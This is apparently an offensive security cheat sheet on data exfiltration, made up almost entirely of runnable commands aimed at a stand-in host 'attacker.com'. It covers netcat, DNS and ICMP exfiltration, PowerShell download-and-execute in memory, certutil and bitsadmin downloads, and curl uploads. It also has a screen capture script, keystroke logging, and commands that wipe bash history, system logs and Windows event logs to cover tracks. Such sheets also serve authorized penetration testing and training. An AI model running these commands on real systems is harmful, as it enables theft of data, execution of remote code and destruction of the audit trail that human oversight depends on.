Data Exfiltration

File Transfer Methods

Linux

HTTP Server

# Python HTTP server
python3 -m http.server 8000
python -m SimpleHTTPServer 8000

# Download from target
wget http://attacker.com:8000/file
curl http://attacker.com:8000/file -o file

# Upload to attacker
# On attacker
while true; do nc -l -p 80 -q 1 < file.txt; done

# On target
curl http://attacker.com/file.txt > file.txt

Netcat

# Send file (attacker receives)
# On attacker
nc -l -p 4444 > received_file

# On target
nc attacker.com 4444 < file_to_send

# Receive file (attacker sends)
# On attacker
nc -l -p 4444 < file_to_send

# On target
nc attacker.com 4444 > received_file

SCP

# Copy from target
scp user@target:/path/to/file /local/path

# Copy to target
scp /local/file user@target:/path/to/

# Recursive
scp -r user@target:/path/to/dir /local/path

Base64 Encoding

# Encode and exfiltrate
base64 file.txt > file.b64
cat file.b64 # Copy and paste

# Decode
base64 -d file.b64 > file.txt

DNS Exfiltration

# Encode data in DNS queries
for line in $(cat data.txt); do
    dig $line.attacker.com
done

Windows

PowerShell Download

# Download file
Invoke-WebRequest -Uri http://attacker.com/file.txt -OutFile C:\file.txt
wget http://attacker.com/file.txt -OutFile C:\file.txt
iwr http://attacker.com/file.txt -OutFile C:\file.txt

# Execute in memory
IEX (New-Object Net.WebClient).DownloadString('http://attacker.com/script.ps1')

# Download and execute
powershell -c "IEX(New-Object Net.WebClient).DownloadString('http://attacker.com/script.ps1')"

PowerShell Upload

# Upload via POST
Invoke-RestMethod -Uri http://attacker.com/upload -Method Post -InFile C:\file.txt

# Upload using WebClient
(New-Object System.Net.WebClient).UploadFile('http://attacker.com/upload', 'C:\file.txt')

Certutil

# Download file
certutil -urlcache -f http://attacker.com/file.txt file.txt
certutil -urlcache -split -f http://attacker.com/file.txt file.txt

BITSAdmin

# Download file
bitsadmin /transfer mydownload /download /priority high http://attacker.com/file.txt C:\file.txt

SMB

# Copy from SMB share
copy \\attacker.com\share\file.txt C:\file.txt

# Net use
net use Z: \\attacker.com\share
copy Z:\file.txt C:\file.txt

FTP

# Create FTP script
echo open attacker.com > ftp.txt
echo user username password >> ftp.txt
echo binary >> ftp.txt
echo get file.txt >> ftp.txt
echo bye >> ftp.txt

# Execute
ftp -s:ftp.txt

Data Compression

Linux Compression

# Tar and gzip
tar -czf archive.tar.gz /path/to/data

# Zip
zip -r archive.zip /path/to/data

# 7zip
7z a archive.7z /path/to/data

Windows Compression

# Compress folder
Compress-Archive -Path C:\data -DestinationPath C:\data.zip

# Extract
Expand-Archive -Path C:\data.zip -DestinationPath C:\extracted

Exfiltration Over Allowed Protocols

HTTPS

# Upload via curl
curl -X POST -F "file=@data.txt" https://attacker.com/upload

# With authentication
curl -X POST -F "file=@data.txt" -u user:pass https://attacker.com/upload

DNS

# Encode data in DNS queries
for b in $(xxd -p data.txt | fold -w2); do
    dig $b.attacker.com
done

ICMP

# ICMP exfiltration
# On attacker (listen)
tcpdump -i eth0 icmp

# On target (send)
ping -c 1 -p $(echo "data" | xxd -p) attacker.com

Cloud Storage

# AWS S3
aws s3 cp file.txt s3://bucket/file.txt

# Azure Blob
az storage blob upload -f file.txt -c container -n file.txt

# Google Drive (gdrive)
gdrive upload file.txt

# Dropbox (dbxcli)
dbxcli put file.txt /remote/path

Email Exfiltration

# Send file via email
echo "Sensitive data" | mail -s "Subject" -a file.txt attacker@email.com

# PowerShell
Send-MailMessage -To "attacker@email.com" -From "target@email.com" -Subject "Data" -Attachment "C:\data.txt" -SmtpServer smtp.server.com

Screen Capture

Linux Capture

# Take screenshot
scrot screenshot.png
import -window root screenshot.png

Windows Capture

# PowerShell screenshot
Add-Type -AssemblyName System.Windows.Forms
$screen = [System.Windows.Forms.Screen]::PrimaryScreen.Bounds
$bitmap = New-Object System.Drawing.Bitmap $screen.Width, $screen.Height
$graphics = [System.Drawing.Graphics]::FromImage($bitmap)
$graphics.CopyFromScreen($screen.Location, [System.Drawing.Point]::Empty, $screen.Size)
$bitmap.Save("C:\screenshot.png")

Keylogging

Linux Keylogging

# Log keystrokes
xinput list
xinput test <device-id>

Windows Keylogging

# PowerShell keylogger
# Use Get-Keystrokes from PowerSploit

Covering Tracks

Linux Tracks

# Clear bash history
history -c
rm ~/.bash_history

# Clear logs
echo "" > /var/log/auth.log
echo "" > /var/log/syslog

# Clear wtmp
echo "" > /var/log/wtmp

Windows Tracks

# Clear event logs
wevtutil cl System
wevtutil cl Security
wevtutil cl Application

# PowerShell
Clear-EventLog -LogName System
Clear-EventLog -LogName Security
Clear-EventLog -LogName Application

# Delete specific events
wevtutil qe Security /q:"*[System[(EventID=4624)]]" /f:text

Useful Links

• Data Exfiltration Techniques
• MITRE ATT&CK - Exfiltration
• DNSExfiltrator
• Cloud Storage CLI Tools
• Covering Tracks Guide